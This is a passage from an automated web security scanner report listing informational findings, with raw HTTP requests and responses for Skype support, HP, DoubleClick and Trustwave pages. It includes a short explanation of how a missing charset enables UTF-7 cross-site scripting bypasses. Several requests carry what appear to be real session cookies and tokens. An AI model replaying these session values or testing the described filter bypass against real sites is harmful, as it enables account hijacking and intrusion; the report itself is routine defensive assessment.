24.131. https://support.skype.com/en/category/PREPAID_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PREPAID_CARDS/

Request

GET /en/category/PREPAID_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47302


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.132. https://support.skype.com/en/category/PRIVACY__SECURITY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PRIVACY__SECURITY/

Request

GET /en/category/PRIVACY__SECURITY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52362


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.133. https://support.skype.com/en/category/PROD  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PROD

Request

GET /en/category/PROD HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.134. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/SKYPE_FOR_YOUR_MOBILE

Request

GET /en/category/SKYPE_FOR_YOUR_MOBILE HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:46 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.135. https://support.skype.com/en/category/SUBSCRIPTIONS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/SUBSCRIPTIONS/

Request

GET /en/category/SUBSCRIPTIONS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51921


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.136. https://support.skype.com/en/category/TECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/TECH

Request

GET /en/category/TECH HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:45 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.137. https://support.skype.com/en/category/TS_ACCOUNT/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/TS_ACCOUNT/

Request

GET /en/category/TS_ACCOUNT/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52140


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.138. https://support.skype.com/en/category/UKASH/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/UKASH/

Request

GET /en/category/UKASH/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:22 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47735


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.139. https://support.skype.com/en/category/VID_CALL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/VID_CALL

Request

GET /en/category/VID_CALL HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.140. https://support.skype.com/en/category/VOUCHERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/VOUCHERS/

Request

GET /en/category/VOUCHERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48873


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.141. https://support.skype.com/en/category/YANDEX_MONEY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/YANDEX_MONEY/

Request

GET /en/category/YANDEX_MONEY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:13 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 46809


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...

24.142. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA10184/How-do-I-create-a-Skype-account

Request

GET /en/faq/FA10184/How-do-I-create-a-Skype-account HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:45 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 52423
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How do I create a Skype account?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides
...[SNIP]...

24.143. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA10673/What-is-Skype-Home

Request

GET /en/faq/FA10673/What-is-Skype-Home HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52104


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: What is Skype Home?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, troubleshoo
...[SNIP]...

24.144. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA109/I-ve-forgotten-my-password

Request

GET /en/faq/FA109/I-ve-forgotten-my-password HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:11 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54142


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: I...ve forgotten my password...</title>
   <meta name="description" content="Help using Skype - FAQs, user guides,
...[SNIP]...

24.145. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

Request

GET /en/faq/FA1170/How-can-I-contact-Skype-Customer-Service HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:19 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51161


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How can I contact Skype Customer Service?</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.146. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

Request

GET /en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:20 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52675


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype: How do I change my email address, or add another email address to my profile?</title>
   <meta name="description"
...[SNIP]...

24.147. https://support.skype.com/en/glossary  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/glossary

Request

GET /en/glossary HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 67060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...

24.148. https://support.skype.com/en/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/search

Request

GET /en/search?q=xss HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: support.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=C51B9013C862C1913F4926F5DFFB3B93; skypeSessionId=C51B9013C862C1913F4926F5DFFB3B93

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Length: 42545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...

24.149. https://support.skype.com/en/tips  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/tips

Request

GET /en/tips HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 44026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...

24.150. https://www.trustwave.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.trustwave.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3f8jad7n25ekrcbukulr2hcf12

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:30 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 21:58:13 GMT
ETag: "84153-37e-49b0347768740"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..........................................@.U..U..U..U..U..U..U..U..U..U...@................U..U..U..U..U..U..U..U..U..U.....................U..U..U..U..U..U..U..U..U.
...[SNIP]...

25. HTML does not specify charset  previous  next
There are 29 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


25.1. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/newscolumns_businessstory

Request

GET /adi/interactive.wsj.com/newscolumns_businessstory;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=4;sz=377x135;ord=9507950795079507; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 576
Date: Sun, 04 Sep 2011 16:17:28 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/d;243471978;0-0;10;1425096
...[SNIP]...

25.2. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/snippet_free_pass

Request

GET /adi/interactive.wsj.com/snippet_free_pass;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=3;sz=571x208;ord=9507950795079507; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 583
Date: Sun, 04 Sep 2011 16:17:28 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/z;242159935;0-0;2;61805211
...[SNIP]...

25.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2377221&PluID=0&w=300&h=600&ord=6858311&ifrm=1&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/h%3B239066737%3B0-0%3B0%3B14250961%3B4986-300/600%3B41415471/41433258/1%3Bu%3D%2A%2A300x250%2C336x280%2C300x600%2C336x850%2A%2A%2A%2A%2A%2A223%2C234%2C220%2C231%2C233%2C227%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A300x250%2C336x280%2C300x600%2C336x850%2A%2A%2A%2A%2A%2A223%2C234%2C220%2C231%2C233%2C227%2A%2A%3Bpage%3Darticle%3Bmsrc%3Dgooglenews_wsj%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D231%3Bp39%3D233%3Bp39%3D227%3B%3Bmc%3Dgoogle_fullfree%3Btile%3D5%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/newscolumns_businessstory;u=**300x250,336x280,300x600,336x850******223,234,220,231,233,227**;page=article;msrc=googlenews_wsj;p39=223;p39=234;p39=220;p39=231;p39=233;p39=227;;mc=google_fullfree;tile=5;sz=300x250,336x280,300x600,336x850;ord=9507950795079507;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 04 Sep 2011 16:17:42 GMT
Connection: close
Content-Length: 2974

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

25.4. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2305757;type=hpcom559;cat=hpcom619;ord=1;num=6795315628405.66? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://search.hp.com/query.html?lang=en&qp=&search=&qt=xss&la=en&hps=Home&hpr=http%3A//h41131.www4.hp.com/us/en&charset=utf-8&cc=us&hpn=Home&hpa=http%3A//www.hp.com/country/us/en/contact_us.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 16:19:47 GMT
Expires: Sun, 04 Sep 2011 16:19:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 732
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<IMG SRC="http://ad
...[SNIP]...

25.5. https://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2609787;type=skype282;cat=webre621;ord=1;num=1? HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: id=22862f3847010064||t=1314119006|et=730|cs=002213fd487350b8c101372f4c
Host: fls.doubleclick.net
Connection: Keep-Alive
Cache-Control: no-cache
Referer: https://login.skype.com/account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114
Accept-Language: en-US

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 18:00:24 GMT
Expires: Sun, 04 Sep 2011 18:00:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1239
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://se
...[SNIP]...

25.6. http://h41105.www4.hp.com/m/us/en/index.xsl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h41105.www4.hp.com
Path:   /m/us/en/index.xsl

Request

GET /m/us/en/index.xsl HTTP/1.1
Host: h41105.www4.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:32:32 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...

25.7. http://h71028.www7.hp.com/enterprise/us/en/halo/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h71028.www7.hp.com
Path:   /enterprise/us/en/halo/index.html

Request

GET /enterprise/us/en/halo/index.html HTTP/1.1
Host: h71028.www7.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/html
Last-Modified: Tue, 16 Nov 2010 15:37:04 GMT
Accept-Ranges: bytes
ETag: "2877df1ea485cb1:383"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:32:36 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="REFRESH" content="0;url=http://www8.hp.com/us/en/business-solutions/visual-collaboration/index.html
...[SNIP]...

25.8. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h71036.www7.hp.com
Path:   /hho/cache/252121-0-0-225-121.html

Request

GET /hho/cache/252121-0-0-225-121.html HTTP/1.1
Host: h71036.www7.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 370
Content-Type: text/html
Last-Modified: Tue, 08 Sep 2009 14:25:26 GMT
Accept-Ranges: bytes
ETag: "274e65359030ca1:3d0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:32:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>

   <head>
<meta name="alternate_title" content="HHO">
<title>HH
...[SNIP]...

25.9. http://h71036.www7.hp.com/hho/cache/597818-0-0-225-121.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h71036.www7.hp.com
Path:   /hho/cache/597818-0-0-225-121.html

Request

GET /hho/cache/597818-0-0-225-121.html HTTP/1.1
Host: h71036.www7.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 729
Content-Type: text/html
Last-Modified: Wed, 11 Nov 2009 15:53:56 GMT
Accept-Ranges: bytes
ETag: "4c6d2e2de762ca1:3d0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:32:36 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>

   <head>
<meta name="alternate_title" content="HHO">
<title
